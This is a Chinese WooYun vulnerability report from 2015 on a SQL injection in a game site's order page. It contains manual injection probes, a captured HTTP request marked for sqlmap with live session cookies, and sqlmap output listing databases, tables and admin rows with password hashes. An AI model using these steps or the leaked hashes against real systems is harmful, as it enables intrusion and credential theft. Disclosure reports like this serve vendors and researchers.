当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123278

漏洞标题:49游某站MySql伪静态注入(涉及用户数据库)

相关厂商:49you.com

漏洞作者: DloveJ

提交时间:2015-06-29 13:03

修复时间:2015-08-13 13:06

公开时间:2015-08-13 13:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商已经确认,细节仅向厂商公开
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

我是为了奖金。涉及用户数据库!

详细说明:

http://gm.49you.com/order/line/rid/15158.html


1.jpg


手工 and 1=1正常


2.jpg


and 1=2不正常


3.jpg


有了注入之后交给sqlmap
抓包

GET /order/line/rid/15158* HTTP/1.1
Host: gm.49you.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: member=yxtest123; member=yxtest123; member_referrer=https%3A%2F%2Fs.bt.gg%2F; location_ref=http%3A%2F%2Fsxd.49you.com%2F%3Fid%3D16187; PHPSESSID=3a24h6lf1hfhvd434574nimfd0; pt_usname=yxtest123; web_member_login_status=CWVWblEoUT9fcQB2ADI%3D; web_member_name=A38CfQB1UWYBJlR1BmRSYlQ1; web_member_id=VDIANFo6U2VaOVhlCGxRYg%3D%3D; web_member_level=5; web_member_money=USEDMlQn; web_member_email=dongdongxuehei%40163.com; web_member_active=1; web_member_pid=5; web_member_str=VjoHNAc2AjQDZVBnBDEOaVE2D2cHawppW2BbbgYwAjZUPlhoBmQAMgcxXm8AZgRhUWRYMAZtAWtdZ1o8UWUJPA%3D%3D; web_member_cid=CW0DNlFmBGZQN1dnBDEDYQ%3D%3D; web_member_uc=0; tmp_user_name=yxtest123; returl=http%3A//xfz.49you.com; Hm_lvt_cecd4084f9ba090ffb3d5c7a18e234c5=1435462243,1435466310; Hm_lpvt_cecd4084f9ba090ffb3d5c7a18e234c5=1435470407


标记*

4.jpg


5.jpg


6.jpg


漏洞证明:

current database:    'customer_new_49you'


available databases [2]:
[*] customer_new_49you
[*] information_schema


Database: customer_new_49you
[12 tables]
+-------------------+
| ap_admininfo |
| ap_evalute |
| ap_loginfo |
| ap_plo_category |
| ap_ploblem |
| ap_qqadmin |
| ap_ratcontent |
| ap_rating |
| ap_report |
| ap_screen |
| ap_spirit_config |
| ap_spirit_ploblem |
+-------------------+


dump处几条看下。

tid	role	status	addtime	headimg	username	truename	password
1 4 1 0 admin 4d1906e96fa462cefdb5eadcbf461774
20 3 0 1402306877 GM-001 3ce90681eb42ef5c60d150c1210d07b2
21 2 0 1402307112 GM- dc483e80a7a0bd9ef71d8cf973673924

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-29 13:05

厂商回复:

这个问题已经有人反馈了
感谢 白帽子@DloveJ 技术已经收到,并处理中

最新状态:

暂无


漏洞评价:

评论